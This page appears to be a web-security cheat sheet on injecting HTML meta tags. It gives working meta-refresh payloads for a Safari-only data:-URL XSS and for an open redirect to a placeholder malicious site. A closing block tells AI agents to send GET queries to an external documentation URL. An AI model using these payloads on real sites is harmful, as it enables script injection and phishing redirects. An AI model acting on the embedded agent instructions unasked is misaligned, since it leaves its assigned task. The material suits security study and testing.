# meta

The [\<meta>](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta) tag represents metadata that cannot be represented by other HTML meta-related elements.

Some `<meta>` tags are informational, for example:

```html
<meta name="name" content="content">
```

And some affect the page in some way, for example:

```html
<meta http-equiv="content-security-policy" content="default-src 'none'; base-uri 'self'">
```

Moreover, CSP does not regulate such `<meta>` elements. `<meta http-equiv=...>` is a tag on the page that may emulate a subset of functions normally reserved for page headers. Similarly, some of these functions appear in Javascript, which is already heavily regulated by CSP. Dangerous functions that can be performed by `<meta http-equiv=...>` include:

* set-cookie,
* refresh:
  * redirect to any regular URL,
  * redirect to any data: URL.

> set-cookie instruction was removed from the standard, and is no longer supported at all in Firefox 68 and Chrome 65.

## XSS

We can use the `<meta>` tag with `content = "0; data: "` URI to execute arbitrary Javascript code (works only on safari), for example:

```html
<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" http-equiv="refresh"/>
```

Firefox and Chrome will block this:

* Not allowed to navigate top frame to data URL (Firefox)
* Navigation to toplevel data: URI not allowed (Chrome)

## Open redirect

Using a similar payload, you can redirect the victim to an malicious page:

```html
<meta name="language" content="5;http://malicious-website.com" http-equiv="refresh"/>
```

## References

* [\<meta> and \<iframe> tags chained to SSRF](https://medium.com/@know.0nix/hunting-good-bugs-with-only-html-d8fd40d17b38)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://lohitaksh-nandan.gitbook.io/cheat-sheets/web-application/html-injection/meta.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.